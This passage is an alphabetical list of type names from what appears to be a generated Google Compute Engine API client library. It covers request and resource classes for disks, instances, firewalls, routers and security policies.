"AggregatedListDisksRequest", "AggregatedListDiskTypesRequest", "AggregatedListForwardingRulesRequest", "AggregatedListGlobalOperationsRequest", "AggregatedListHealthChecksRequest", "AggregatedListInstanceGroupManagersRequest", "AggregatedListInstanceGroupsRequest", "AggregatedListInstancesRequest", "AggregatedListInterconnectAttachmentsRequest", "AggregatedListMachineTypesRequest", "AggregatedListNetworkEndpointGroupsRequest", "AggregatedListNodeGroupsRequest", "AggregatedListNodeTemplatesRequest", "AggregatedListNodeTypesRequest", "AggregatedListPacketMirroringsRequest", "AggregatedListPublicDelegatedPrefixesRequest", "AggregatedListRegionCommitmentsRequest", "AggregatedListReservationsRequest", "AggregatedListResourcePoliciesRequest", "AggregatedListRoutersRequest", "AggregatedListServiceAttachmentsRequest", "AggregatedListSslCertificatesRequest", "AggregatedListSubnetworksRequest", "AggregatedListTargetHttpProxiesRequest", "AggregatedListTargetHttpsProxiesRequest", "AggregatedListTargetInstancesRequest", "AggregatedListTargetPoolsRequest", "AggregatedListTargetVpnGatewaysRequest", "AggregatedListUrlMapsRequest", "AggregatedListVpnGatewaysRequest", "AggregatedListVpnTunnelsRequest", "AliasIpRange", "AllocationSpecificSKUAllocationAllocatedInstancePropertiesReservedDisk", "AllocationSpecificSKUAllocationReservedInstanceProperties", "AllocationSpecificSKUReservation", "Allowed", "ApplyUpdatesToInstancesInstanceGroupManagerRequest", "ApplyUpdatesToInstancesRegionInstanceGroupManagerRequest", "AttachDiskInstanceRequest", "AttachedDisk", "AttachedDiskInitializeParams", "AttachNetworkEndpointsGlobalNetworkEndpointGroupRequest", "AttachNetworkEndpointsNetworkEndpointGroupRequest", "AuditConfig", "AuditLogConfig", "AuthorizationLoggingOptions", "Autoscaler", "AutoscalerAggregatedList", "AutoscalerList", "AutoscalersScopedList", "AutoscalerStatusDetails", "AutoscalingPolicy", "AutoscalingPolicyCpuUtilization", "AutoscalingPolicyCustomMetricUtilization", "AutoscalingPolicyLoadBalancingUtilization", "AutoscalingPolicyScaleInControl", "AutoscalingPolicyScalingSchedule", "Backend", "BackendBucket", "BackendBucketCdnPolicy", "BackendBucketCdnPolicyBypassCacheOnRequestHeader", "BackendBucketCdnPolicyNegativeCachingPolicy", "BackendBucketList", "BackendService", "BackendServiceAggregatedList", "BackendServiceCdnPolicy", "BackendServiceCdnPolicyBypassCacheOnRequestHeader", "BackendServiceCdnPolicyNegativeCachingPolicy", "BackendServiceFailoverPolicy", "BackendServiceGroupHealth", "BackendServiceIAP", "BackendServiceList", "BackendServiceLogConfig", "BackendServiceReference", "BackendServicesScopedList", "Binding", "BulkInsertInstanceRequest", "BulkInsertInstanceResource", "BulkInsertInstanceResourcePerInstanceProperties", "BulkInsertRegionInstanceRequest", "CacheInvalidationRule", "CacheKeyPolicy", "CircuitBreakers", "CloneRulesFirewallPolicyRequest", "Commitment", "CommitmentAggregatedList", "CommitmentList", "CommitmentsScopedList", "Condition", "ConfidentialInstanceConfig", "ConnectionDraining", "ConsistentHashLoadBalancerSettings", "ConsistentHashLoadBalancerSettingsHttpCookie", "CorsPolicy", "CreateInstancesInstanceGroupManagerRequest", "CreateInstancesRegionInstanceGroupManagerRequest", "CreateSnapshotDiskRequest", "CreateSnapshotRegionDiskRequest", "CustomerEncryptionKey", "CustomerEncryptionKeyProtectedDisk", "Data", "DeleteAccessConfigInstanceRequest", "DeleteAddressRequest", "DeleteAutoscalerRequest", "DeleteBackendBucketRequest", "DeleteBackendServiceRequest", "DeleteDiskRequest", "DeleteExternalVpnGatewayRequest", "DeleteFirewallPolicyRequest", "DeleteFirewallRequest", "DeleteForwardingRuleRequest", "DeleteGlobalAddressRequest", "DeleteGlobalForwardingRuleRequest", "DeleteGlobalNetworkEndpointGroupRequest", "DeleteGlobalOperationRequest", "DeleteGlobalOperationResponse", "DeleteGlobalOrganizationOperationRequest", "DeleteGlobalOrganizationOperationResponse", "DeleteGlobalPublicDelegatedPrefixeRequest", "DeleteHealthCheckRequest", "DeleteImageRequest", "DeleteInstanceGroupManagerRequest", "DeleteInstanceGroupRequest", "DeleteInstanceRequest", "DeleteInstancesInstanceGroupManagerRequest", "DeleteInstancesRegionInstanceGroupManagerRequest", "DeleteInstanceTemplateRequest", "DeleteInterconnectAttachmentRequest", "DeleteInterconnectRequest", "DeleteLicenseRequest", "DeleteNetworkEndpointGroupRequest", "DeleteNetworkRequest", "DeleteNodeGroupRequest", "DeleteNodesNodeGroupRequest", "DeleteNodeTemplateRequest", "DeletePacketMirroringRequest", "DeletePerInstanceConfigsInstanceGroupManagerRequest", "DeletePerInstanceConfigsRegionInstanceGroupManagerRequest", "DeletePublicAdvertisedPrefixeRequest", "DeletePublicDelegatedPrefixeRequest", "DeleteRegionAutoscalerRequest", "DeleteRegionBackendServiceRequest", "DeleteRegionDiskRequest", "DeleteRegionHealthCheckRequest", "DeleteRegionHealthCheckServiceRequest", "DeleteRegionInstanceGroupManagerRequest", "DeleteRegionNetworkEndpointGroupRequest", "DeleteRegionNotificationEndpointRequest", "DeleteRegionOperationRequest", "DeleteRegionOperationResponse", "DeleteRegionSslCertificateRequest", "DeleteRegionTargetHttpProxyRequest", "DeleteRegionTargetHttpsProxyRequest", "DeleteRegionUrlMapRequest", "DeleteReservationRequest", "DeleteResourcePolicyRequest", "DeleteRouteRequest", "DeleteRouterRequest", "DeleteSecurityPolicyRequest", "DeleteServiceAttachmentRequest", "DeleteSignedUrlKeyBackendBucketRequest", "DeleteSignedUrlKeyBackendServiceRequest", "DeleteSnapshotRequest", "DeleteSslCertificateRequest", "DeleteSslPolicyRequest", "DeleteSubnetworkRequest", "DeleteTargetGrpcProxyRequest", "DeleteTargetHttpProxyRequest", "DeleteTargetHttpsProxyRequest", "DeleteTargetInstanceRequest", "DeleteTargetPoolRequest", "DeleteTargetSslProxyRequest", "DeleteTargetTcpProxyRequest", "DeleteTargetVpnGatewayRequest", "DeleteUrlMapRequest", "DeleteVpnGatewayRequest", "DeleteVpnTunnelRequest", "DeleteZoneOperationRequest", "DeleteZoneOperationResponse", "Denied", "DeprecateImageRequest", "DeprecationStatus", "DetachDiskInstanceRequest", "DetachNetworkEndpointsGlobalNetworkEndpointGroupRequest", "DetachNetworkEndpointsNetworkEndpointGroupRequest", "DisableXpnHostProjectRequest", "DisableXpnResourceProjectRequest", "Disk", "DiskAggregatedList", "DiskInstantiationConfig", "DiskList", "DiskMoveRequest", "DisksAddResourcePoliciesRequest", "DisksRemoveResourcePoliciesRequest", "DisksResizeRequest", "DisksScopedList", "DiskType", "DiskTypeAggregatedList", "DiskTypeList", "DiskTypesScopedList", "DisplayDevice", "DistributionPolicy", "DistributionPolicyZoneConfiguration", "Duration", "EnableXpnHostProjectRequest", "EnableXpnResourceProjectRequest", "Error", "Errors", "ExchangedPeeringRoute", "ExchangedPeeringRoutesList", "ExpandIpCidrRangeSubnetworkRequest", "Expr", "ExternalVpnGateway", "ExternalVpnGatewayInterface", "ExternalVpnGatewayList", "FileContentBuffer", "Firewall", "FirewallList", "FirewallLogConfig", "FirewallPoliciesListAssociationsResponse", "FirewallPolicy", "FirewallPolicyAssociation", "FirewallPolicyList", "FirewallPolicyRule", "FirewallPolicyRuleMatcher", "FirewallPolicyRuleMatcherLayer4Config", "FixedOrPercent", "ForwardingRule", "ForwardingRuleAggregatedList", "ForwardingRuleList", "ForwardingRuleReference", "ForwardingRuleServiceDirectoryRegistration", "ForwardingRulesScopedList", "GetAcceleratorTypeRequest", "GetAddressRequest", "GetAssociationFirewallPolicyRequest", "GetAutoscalerRequest", "GetBackendBucketRequest", "GetBackendServiceRequest", "GetDiagnosticsInterconnectRequest", "GetDiskRequest", "GetDiskTypeRequest", "GetEffectiveFirewallsInstanceRequest", "GetEffectiveFirewallsNetworkRequest", "GetExternalVpnGatewayRequest", "GetFirewallPolicyRequest", "GetFirewallRequest", "GetForwardingRuleRequest", "GetFromFamilyImageRequest", "GetGlobalAddressRequest", "GetGlobalForwardingRuleRequest", "GetGlobalNetworkEndpointGroupRequest", "GetGlobalOperationRequest", "GetGlobalOrganizationOperationRequest", "GetGlobalPublicDelegatedPrefixeRequest", "GetGuestAttributesInstanceRequest", "GetHealthBackendServiceRequest", "GetHealthCheckRequest", "GetHealthRegionBackendServiceRequest", "GetHealthTargetPoolRequest", "GetIamPolicyDiskRequest", "GetIamPolicyFirewallPolicyRequest", "GetIamPolicyImageRequest", "GetIamPolicyInstanceRequest", "GetIamPolicyInstanceTemplateRequest", "GetIamPolicyLicenseRequest", "GetIamPolicyNodeGroupRequest", "GetIamPolicyNodeTemplateRequest", "GetIamPolicyRegionDiskRequest", "GetIamPolicyReservationRequest", "GetIamPolicyResourcePolicyRequest", "GetIamPolicyServiceAttachmentRequest", "GetIamPolicySnapshotRequest", "GetIamPolicySubnetworkRequest", "GetImageFamilyViewRequest", "GetImageRequest", "GetInstanceGroupManagerRequest", "GetInstanceGroupRequest", "GetInstanceRequest", "GetInstanceTemplateRequest", "GetInterconnectAttachmentRequest", "GetInterconnectLocationRequest", "GetInterconnectRequest", "GetLicenseCodeRequest", "GetLicenseRequest", "GetMachineTypeRequest", "GetNatMappingInfoRoutersRequest", "GetNetworkEndpointGroupRequest", "GetNetworkRequest", "GetNodeGroupRequest", "GetNodeTemplateRequest", "GetNodeTypeRequest", "GetPacketMirroringRequest", "GetProjectRequest", "GetPublicAdvertisedPrefixeRequest", "GetPublicDelegatedPrefixeRequest", "GetRegionAutoscalerRequest", "GetRegionBackendServiceRequest", "GetRegionCommitmentRequest", "GetRegionDiskRequest", "GetRegionDiskTypeRequest", "GetRegionHealthCheckRequest", "GetRegionHealthCheckServiceRequest", "GetRegionInstanceGroupManagerRequest", "GetRegionInstanceGroupRequest", "GetRegionNetworkEndpointGroupRequest", "GetRegionNotificationEndpointRequest", "GetRegionOperationRequest", "GetRegionRequest", "GetRegionSslCertificateRequest", "GetRegionTargetHttpProxyRequest", "GetRegionTargetHttpsProxyRequest", "GetRegionUrlMapRequest", "GetReservationRequest", "GetResourcePolicyRequest", "GetRouteRequest", "GetRouterRequest", "GetRouterStatusRouterRequest", "GetRuleFirewallPolicyRequest", "GetRuleSecurityPolicyRequest", "GetScreenshotInstanceRequest", "GetSecurityPolicyRequest", "GetSerialPortOutputInstanceRequest", "GetServiceAttachmentRequest", "GetShieldedInstanceIdentityInstanceRequest", "GetSnapshotRequest", "GetSslCertificateRequest", "GetSslPolicyRequest", "GetStatusVpnGatewayRequest", "GetSubnetworkRequest", "GetTargetGrpcProxyRequest", "GetTargetHttpProxyRequest", "GetTargetHttpsProxyRequest", "GetTargetInstanceRequest", "GetTargetPoolRequest", "GetTargetSslProxyRequest", "GetTargetTcpProxyRequest", "GetTargetVpnGatewayRequest", "GetUrlMapRequest", "GetVpnGatewayRequest", "GetVpnTunnelRequest", "GetXpnHostProjectRequest", "GetXpnResourcesProjectsRequest", "GetZoneOperationRequest", "GetZoneRequest", "GlobalNetworkEndpointGroupsAttachEndpointsRequest", "GlobalNetworkEndpointGroupsDetachEndpointsRequest", "GlobalOrganizationSetPolicyRequest", "GlobalSetLabelsRequest", "GlobalSetPolicyRequest", "GRPCHealthCheck", "GuestAttributes", "GuestAttributesEntry", "GuestAttributesValue", "GuestOsFeature", "HealthCheck", "HealthCheckList", "HealthCheckLogConfig", "HealthCheckReference", "HealthChecksAggregatedList", "HealthCheckService", "HealthCheckServiceReference", "HealthCheckServicesList", "HealthChecksScopedList", "HealthStatus", "HealthStatusForNetworkEndpoint", "HostRule", "HTTP2HealthCheck", "HttpFaultAbort", "HttpFaultDelay", "HttpFaultInjection", "HttpHeaderAction", "HttpHeaderMatch", "HttpHeaderOption", "HTTPHealthCheck", "HttpQueryParameterMatch", "HttpRedirectAction", "HttpRetryPolicy", "HttpRouteAction", "HttpRouteRule", "HttpRouteRuleMatch", "HTTPSHealthCheck", "Image", "ImageFamilyView", "ImageList", "InitialStateConfig", "InsertAddressRequest", "InsertAutoscalerRequest", "InsertBackendBucketRequest", "InsertBackendServiceRequest", "InsertDiskRequest", "InsertExternalVpnGatewayRequest", "InsertFirewallPolicyRequest", "InsertFirewallRequest", "InsertForwardingRuleRequest", "InsertGlobalAddressRequest", "InsertGlobalForwardingRuleRequest", "InsertGlobalNetworkEndpointGroupRequest", "InsertGlobalPublicDelegatedPrefixeRequest", "InsertHealthCheckRequest", "InsertImageRequest", "InsertInstanceGroupManagerRequest", "InsertInstanceGroupRequest", "InsertInstanceRequest", "InsertInstanceTemplateRequest", "InsertInterconnectAttachmentRequest", "InsertInterconnectRequest", "InsertLicenseRequest", "InsertNetworkEndpointGroupRequest", "InsertNetworkRequest", "InsertNodeGroupRequest", "InsertNodeTemplateRequest", "InsertPacketMirroringRequest", "InsertPublicAdvertisedPrefixeRequest", "InsertPublicDelegatedPrefixeRequest", "InsertRegionAutoscalerRequest", "InsertRegionBackendServiceRequest", "InsertRegionCommitmentRequest", "InsertRegionDiskRequest", "InsertRegionHealthCheckRequest", "InsertRegionHealthCheckServiceRequest", "InsertRegionInstanceGroupManagerRequest", "InsertRegionNetworkEndpointGroupRequest", "InsertRegionNotificationEndpointRequest", "InsertRegionSslCertificateRequest", "InsertRegionTargetHttpProxyRequest", "InsertRegionTargetHttpsProxyRequest", "InsertRegionUrlMapRequest", "InsertReservationRequest", "InsertResourcePolicyRequest", "InsertRouteRequest", "InsertRouterRequest", "InsertSecurityPolicyRequest", "InsertServiceAttachmentRequest", "InsertSslCertificateRequest", "InsertSslPolicyRequest", "InsertSubnetworkRequest", "InsertTargetGrpcProxyRequest", "InsertTargetHttpProxyRequest", "InsertTargetHttpsProxyRequest", "InsertTargetInstanceRequest", "InsertTargetPoolRequest", "InsertTargetSslProxyRequest", "InsertTargetTcpProxyRequest", "InsertTargetVpnGatewayRequest", "InsertUrlMapRequest", "InsertVpnGatewayRequest", "InsertVpnTunnelRequest", "Instance", "InstanceAggregatedList", "InstanceGroup", "InstanceGroupAggregatedList", "InstanceGroupList", "InstanceGroupManager", "InstanceGroupManagerActionsSummary", "InstanceGroupManagerAggregatedList", "InstanceGroupManagerAutoHealingPolicy", "InstanceGroupManagerList", "InstanceGroupManagersAbandonInstancesRequest", "InstanceGroupManagersApplyUpdatesRequest", "InstanceGroupManagersCreateInstancesRequest", "InstanceGroupManagersDeleteInstancesRequest", "InstanceGroupManagersDeletePerInstanceConfigsReq", "InstanceGroupManagersListErrorsResponse", "InstanceGroupManagersListManagedInstancesResponse", "InstanceGroupManagersListPerInstanceConfigsResp", "InstanceGroupManagersPatchPerInstanceConfigsReq", "InstanceGroupManagersRecreateInstancesRequest", "InstanceGroupManagersScopedList", "InstanceGroupManagersSetInstanceTemplateRequest", "InstanceGroupManagersSetTargetPoolsRequest", "InstanceGroupManagerStatus", "InstanceGroupManagerStatusStateful", "InstanceGroupManagerStatusStatefulPerInstanceConfigs", "InstanceGroupManagerStatusVersionTarget", "InstanceGroupManagersUpdatePerInstanceConfigsReq", "InstanceGroupManagerUpdatePolicy", "InstanceGroupManagerVersion", "InstanceGroupsAddInstancesRequest", "InstanceGroupsListInstances", "InstanceGroupsListInstancesRequest", "InstanceGroupsRemoveInstancesRequest", "InstanceGroupsScopedList", "InstanceGroupsSetNamedPortsRequest", "InstanceList", "InstanceListReferrers", "InstanceManagedByIgmError", "InstanceManagedByIgmErrorInstanceActionDetails", "InstanceManagedByIgmErrorManagedInstanceError", "InstanceMoveRequest", "InstanceProperties", "InstanceReference", "InstancesAddResourcePoliciesRequest", "InstancesGetEffectiveFirewallsResponse", "InstancesGetEffectiveFirewallsResponseEffectiveFirewallPolicy", "InstancesRemoveResourcePoliciesRequest", "InstancesScopedList", "InstancesSetLabelsRequest", "InstancesSetMachineResourcesRequest", "InstancesSetMachineTypeRequest", "InstancesSetMinCpuPlatformRequest", "InstancesSetServiceAccountRequest", "InstancesStartWithEncryptionKeyRequest", "InstanceTemplate", "InstanceTemplateList", "InstanceWithNamedPorts", "Int64RangeMatch", "Interconnect", "InterconnectAttachment", "InterconnectAttachmentAggregatedList", "InterconnectAttachmentList", "InterconnectAttachmentPartnerMetadata", "InterconnectAttachmentPrivateInfo", "InterconnectAttachmentsScopedList", "InterconnectCircuitInfo", "InterconnectDiagnostics", "InterconnectDiagnosticsARPEntry", "InterconnectDiagnosticsLinkLACPStatus", "InterconnectDiagnosticsLinkOpticalPower", "InterconnectDiagnosticsLinkStatus", "InterconnectList", "InterconnectLocation", "InterconnectLocationList", "InterconnectLocationRegionInfo", "InterconnectOutageNotification", "InterconnectsGetDiagnosticsResponse", "InvalidateCacheUrlMapRequest", "Items", "License", "LicenseCode", "LicenseCodeLicenseAlias", "LicenseResourceCommitment", "LicenseResourceRequirements", "LicensesListResponse", "ListAcceleratorTypesRequest", "ListAddressesRequest", "ListAssociationsFirewallPolicyRequest", "ListAutoscalersRequest", "ListAvailableFeaturesSslPoliciesRequest", "ListBackendBucketsRequest", "ListBackendServicesRequest", "ListDisksRequest", "ListDiskTypesRequest", "ListErrorsInstanceGroupManagersRequest", "ListErrorsRegionInstanceGroupManagersRequest", "ListExternalVpnGatewaysRequest", "ListFirewallPoliciesRequest", "ListFirewallsRequest", "ListForwardingRulesRequest", "ListGlobalAddressesRequest", "ListGlobalForwardingRulesRequest", "ListGlobalNetworkEndpointGroupsRequest", "ListGlobalOperationsRequest", "ListGlobalOrganizationOperationsRequest", "ListGlobalPublicDelegatedPrefixesRequest", "ListHealthChecksRequest", "ListImagesRequest", "ListInstanceGroupManagersRequest", "ListInstanceGroupsRequest", "ListInstancesInstanceGroupsRequest", "ListInstancesRegionInstanceGroupsRequest", "ListInstancesRequest", "ListInstanceTemplatesRequest", "ListInterconnectAttachmentsRequest", "ListInterconnectLocationsRequest", "ListInterconnectsRequest", "ListLicensesRequest", "ListMachineTypesRequest", "ListManagedInstancesInstanceGroupManagersRequest", "ListManagedInstancesRegionInstanceGroupManagersRequest", "ListNetworkEndpointGroupsRequest", "ListNetworkEndpointsGlobalNetworkEndpointGroupsRequest", "ListNetworkEndpointsNetworkEndpointGroupsRequest", "ListNetworksRequest", "ListNodeGroupsRequest", "ListNodesNodeGroupsRequest", "ListNodeTemplatesRequest", "ListNodeTypesRequest", "ListPacketMirroringsRequest", "ListPeeringRoutesNetworksRequest", "ListPerInstanceConfigsInstanceGroupManagersRequest", "ListPerInstanceConfigsRegionInstanceGroupManagersRequest", "ListPreconfiguredExpressionSetsSecurityPoliciesRequest", "ListPublicAdvertisedPrefixesRequest", "ListPublicDelegatedPrefixesRequest", "ListReferrersInstancesRequest", "ListRegionAutoscalersRequest", "ListRegionBackendServicesRequest", "ListRegionCommitmentsRequest", "ListRegionDisksRequest", "ListRegionDiskTypesRequest", "ListRegionHealthCheckServicesRequest", "ListRegionHealthChecksRequest", "ListRegionInstanceGroupManagersRequest", "ListRegionInstanceGroupsRequest", "ListRegionNetworkEndpointGroupsRequest", "ListRegionNotificationEndpointsRequest", "ListRegionOperationsRequest", "ListRegionsRequest", "ListRegionSslCertificatesRequest", "ListRegionTargetHttpProxiesRequest", "ListRegionTargetHttpsProxiesRequest", "ListRegionUrlMapsRequest", "ListReservationsRequest", "ListResourcePoliciesRequest", "ListRoutersRequest", "ListRoutesRequest", "ListSecurityPoliciesRequest", "ListServiceAttachmentsRequest", "ListSnapshotsRequest", "ListSslCertificatesRequest", "ListSslPoliciesRequest", "ListSubnetworksRequest", "ListTargetGrpcProxiesRequest", "ListTargetHttpProxiesRequest", "ListTargetHttpsProxiesRequest", "ListTargetInstancesRequest", "ListTargetPoolsRequest", "ListTargetSslProxiesRequest", "ListTargetTcpProxiesRequest", "ListTargetVpnGatewaysRequest", "ListUrlMapsRequest", "ListUsableSubnetworksRequest", "ListVpnGatewaysRequest", "ListVpnTunnelsRequest", "ListXpnHostsProjectsRequest", "ListZoneOperationsRequest", "ListZonesRequest", "LocalDisk", "LocationPolicy", "LocationPolicyLocation", "LogConfig", "LogConfigCloudAuditOptions", "LogConfigCounterOptions", "LogConfigCounterOptionsCustomField", "LogConfigDataAccessOptions", "MachineType", "MachineTypeAggregatedList", "MachineTypeList", "MachineTypesScopedList", "ManagedInstance", "ManagedInstanceInstanceHealth", "ManagedInstanceLastAttempt", "ManagedInstanceVersion", "Metadata", "MetadataFilter", "MetadataFilterLabelMatch", "MoveDiskProjectRequest", "MoveFirewallPolicyRequest", "MoveInstanceProjectRequest", "NamedPort", "Network", "NetworkEndpoint", "NetworkEndpointGroup", "NetworkEndpointGroupAggregatedList", "NetworkEndpointGroupAppEngine", "NetworkEndpointGroupCloudFunction", "NetworkEndpointGroupCloudRun", "NetworkEndpointGroupList", "NetworkEndpointGroupsAttachEndpointsRequest", "NetworkEndpointGroupsDetachEndpointsRequest", "NetworkEndpointGroupsListEndpointsRequest", "NetworkEndpointGroupsListNetworkEndpoints", "NetworkEndpointGroupsScopedList", "NetworkEndpointWithHealthStatus", "NetworkInterface", "NetworkList", "NetworkPeering", "NetworkRoutingConfig", "NetworksAddPeeringRequest", "NetworksGetEffectiveFirewallsResponse", "NetworksGetEffectiveFirewallsResponseEffectiveFirewallPolicy", "NetworksRemovePeeringRequest", "NetworksUpdatePeeringRequest", "NodeGroup", "NodeGroupAggregatedList", "NodeGroupAutoscalingPolicy", "NodeGroupList", "NodeGroupMaintenanceWindow", "NodeGroupNode", "NodeGroupsAddNodesRequest", "NodeGroupsDeleteNodesRequest", "NodeGroupsListNodes", "NodeGroupsScopedList", "NodeGroupsSetNodeTemplateRequest", "NodeTemplate", "NodeTemplateAggregatedList", "NodeTemplateList", "NodeTemplateNodeTypeFlexibility", "NodeTemplatesScopedList", "NodeType", "NodeTypeAggregatedList", "NodeTypeList", "NodeTypesScopedList", "NotificationEndpoint", "NotificationEndpointGrpcSettings", "NotificationEndpointList", "Operation", "OperationAggregatedList", "OperationList", "OperationsScopedList", "OutlierDetection", "PacketMirroring", "PacketMirroringAggregatedList", "PacketMirroringFilter", "PacketMirroringForwardingRuleInfo", "PacketMirroringList", "PacketMirroringMirroredResourceInfo", "PacketMirroringMirroredResourceInfoInstanceInfo", "PacketMirroringMirroredResourceInfoSubnetInfo", "PacketMirroringNetworkInfo", "PacketMirroringsScopedList", "PatchAutoscalerRequest", "PatchBackendBucketRequest", "PatchBackendServiceRequest", "PatchFirewallPolicyRequest", "PatchFirewallRequest", "PatchForwardingRuleRequest", "PatchGlobalForwardingRuleRequest", "PatchGlobalPublicDelegatedPrefixeRequest", "PatchHealthCheckRequest", "PatchImageRequest", "PatchInstanceGroupManagerRequest", "PatchInterconnectAttachmentRequest", "PatchInterconnectRequest", "PatchNetworkRequest", "PatchNodeGroupRequest", "PatchPacketMirroringRequest", "PatchPerInstanceConfigsInstanceGroupManagerRequest", "PatchPerInstanceConfigsRegionInstanceGroupManagerRequest", "PatchPublicAdvertisedPrefixeRequest", "PatchPublicDelegatedPrefixeRequest", "PatchRegionAutoscalerRequest", "PatchRegionBackendServiceRequest", "PatchRegionHealthCheckRequest", "PatchRegionHealthCheckServiceRequest", "PatchRegionInstanceGroupManagerRequest", "PatchRegionUrlMapRequest", "PatchRouterRequest", "PatchRuleFirewallPolicyRequest", "PatchRuleSecurityPolicyRequest", "PatchSecurityPolicyRequest", "PatchServiceAttachmentRequest", "PatchSslPolicyRequest", "PatchSubnetworkRequest", "PatchTargetGrpcProxyRequest", "PatchTargetHttpProxyRequest", "PatchTargetHttpsProxyRequest", "PatchUrlMapRequest", "PathMatcher", "PathRule", "PerInstanceConfig", "Policy", "PreconfiguredWafSet", "PreservedState", "PreservedStatePreservedDisk", "PreviewRouterRequest", "Project", "ProjectsDisableXpnResourceRequest", "ProjectsEnableXpnResourceRequest", "ProjectsGetXpnResources", "ProjectsListXpnHostsRequest", "ProjectsSetDefaultNetworkTierRequest", "PublicAdvertisedPrefix", "PublicAdvertisedPrefixList", "PublicAdvertisedPrefixPublicDelegatedPrefix", "PublicDelegatedPrefix", "PublicDelegatedPrefixAggregatedList", "PublicDelegatedPrefixesScopedList", "PublicDelegatedPrefixList", "PublicDelegatedPrefixPublicDelegatedSubPrefix", "Quota", "RawDisk", "RecreateInstancesInstanceGroupManagerRequest", "RecreateInstancesRegionInstanceGroupManagerRequest", "Reference", "Region", "RegionAutoscalerList", "RegionDisksAddResourcePoliciesRequest", "RegionDisksRemoveResourcePoliciesRequest", "RegionDisksResizeRequest", "RegionDiskTypeList", "RegionInstanceGroupList", "RegionInstanceGroupManagerDeleteInstanceConfigReq", "RegionInstanceGroupManagerList", "RegionInstanceGroupManagerPatchInstanceConfigReq", "RegionInstanceGroupManagersAbandonInstancesRequest", "RegionInstanceGroupManagersApplyUpdatesRequest", "RegionInstanceGroupManagersCreateInstancesRequest", "RegionInstanceGroupManagersDeleteInstancesRequest", "RegionInstanceGroupManagersListErrorsResponse", "RegionInstanceGroupManagersListInstanceConfigsResp", "RegionInstanceGroupManagersListInstancesResponse", "RegionInstanceGroupManagersRecreateRequest", "RegionInstanceGroupManagersSetTargetPoolsRequest", "RegionInstanceGroupManagersSetTemplateRequest", "RegionInstanceGroupManagerUpdateInstanceConfigReq", "RegionInstanceGroupsListInstances", "RegionInstanceGroupsListInstancesRequest", "RegionInstanceGroupsSetNamedPortsRequest", "RegionList", "RegionSetLabelsRequest", "RegionSetPolicyRequest", "RegionTargetHttpsProxiesSetSslCertificatesRequest", "RegionUrlMapsValidateRequest", "RemoveAssociationFirewallPolicyRequest", "RemoveHealthCheckTargetPoolRequest", "RemoveInstancesInstanceGroupRequest", "RemoveInstanceTargetPoolRequest", "RemovePeeringNetworkRequest", "RemoveResourcePoliciesDiskRequest", "RemoveResourcePoliciesInstanceRequest", "RemoveResourcePoliciesRegionDiskRequest", "RemoveRuleFirewallPolicyRequest", "RemoveRuleSecurityPolicyRequest", "RequestMirrorPolicy", "Reservation", "ReservationAffinity", "ReservationAggregatedList", "ReservationList", "ReservationsResizeRequest", "ReservationsScopedList", "ResetInstanceRequest", "ResizeDiskRequest", "ResizeInstanceGroupManagerRequest", "ResizeRegionDiskRequest", "ResizeRegionInstanceGroupManagerRequest", "ResizeReservationRequest", "ResourceCommitment", "ResourceGroupReference", "ResourcePoliciesScopedList", "ResourcePolicy", "ResourcePolicyAggregatedList", "ResourcePolicyDailyCycle", "ResourcePolicyGroupPlacementPolicy", "ResourcePolicyHourlyCycle", "ResourcePolicyInstanceSchedulePolicy", "ResourcePolicyInstanceSchedulePolicySchedule", "ResourcePolicyList", "ResourcePolicyResourceStatus", "ResourcePolicyResourceStatusInstanceSchedulePolicyStatus", "ResourcePolicySnapshotSchedulePolicy", "ResourcePolicySnapshotSchedulePolicyRetentionPolicy", "ResourcePolicySnapshotSchedulePolicySchedule", "ResourcePolicySnapshotSchedulePolicySnapshotProperties", "ResourcePolicyWeeklyCycle", "ResourcePolicyWeeklyCycleDayOfWeek", "Route", "RouteAsPath", "RouteList", "Router", "RouterAdvertisedIpRange", "RouterAggregatedList", "RouterBgp", "RouterBgpPeer", "RouterBgpPeerBfd", "RouterInterface", "RouterList", "RouterNat", "RouterNatLogConfig", "RouterNatRule", "RouterNatRuleAction", "RouterNatSubnetworkToNat", "RoutersPreviewResponse", "RoutersScopedList", "RouterStatus", "RouterStatusBgpPeerStatus", "RouterStatusNatStatus", "RouterStatusNatStatusNatRuleStatus", "RouterStatusResponse", "Rule", "ScalingScheduleStatus", "Scheduling", "SchedulingNodeAffinity", "ScratchDisks", "Screenshot", "SecurityPoliciesListPreconfiguredExpressionSetsResponse", "SecurityPoliciesWafConfig", "SecurityPolicy", "SecurityPolicyAdaptiveProtectionConfig", "SecurityPolicyAdaptiveProtectionConfigLayer7DdosDefenseConfig", "SecurityPolicyAdvancedOptionsConfig", "SecurityPolicyList", "SecurityPolicyReference", "SecurityPolicyRule", "SecurityPolicyRuleMatcher", "SecurityPolicyRuleMatcherConfig", "SecuritySettings", "SendDiagnosticInterruptInstanceRequest", "SendDiagnosticInterruptInstanceResponse", "SerialPortOutput", "ServerBinding", "ServiceAccount", "ServiceAttachment", "ServiceAttachmentAggregatedList", "ServiceAttachmentConnectedEndpoint", "ServiceAttachmentConsumerProjectLimit", "ServiceAttachmentList", "ServiceAttachmentsScopedList", "SetBackendServiceTargetSslProxyRequest", "SetBackendServiceTargetTcpProxyRequest", "SetBackupTargetPoolRequest", "SetCommonInstanceMetadataProjectRequest", "SetDefaultNetworkTierProjectRequest", "SetDeletionProtectionInstanceRequest", "SetDiskAutoDeleteInstanceRequest", "SetIamPolicyDiskRequest", "SetIamPolicyFirewallPolicyRequest", "SetIamPolicyImageRequest", "SetIamPolicyInstanceRequest", "SetIamPolicyInstanceTemplateRequest", "SetIamPolicyLicenseRequest", "SetIamPolicyNodeGroupRequest", "SetIamPolicyNodeTemplateRequest", "SetIamPolicyRegionDiskRequest", "SetIamPolicyReservationRequest", "SetIamPolicyResourcePolicyRequest", "SetIamPolicyServiceAttachmentRequest", "SetIamPolicySnapshotRequest", "SetIamPolicySubnetworkRequest", "SetInstanceTemplateInstanceGroupManagerRequest", "SetInstanceTemplateRegionInstanceGroupManagerRequest", "SetLabelsDiskRequest", "SetLabelsExternalVpnGatewayRequest", "SetLabelsForwardingRuleRequest", "SetLabelsGlobalForwardingRuleRequest", "SetLabelsImageRequest", "SetLabelsInstanceRequest", "SetLabelsRegionDiskRequest", "SetLabelsSnapshotRequest", "SetLabelsVpnGatewayRequest", "SetMachineResourcesInstanceRequest", "SetMachineTypeInstanceRequest", "SetMetadataInstanceRequest", "SetMinCpuPlatformInstanceRequest", "SetNamedPortsInstanceGroupRequest", "SetNamedPortsRegionInstanceGroupRequest", "SetNodeTemplateNodeGroupRequest", "SetPrivateIpGoogleAccessSubnetworkRequest", "SetProxyHeaderTargetSslProxyRequest", 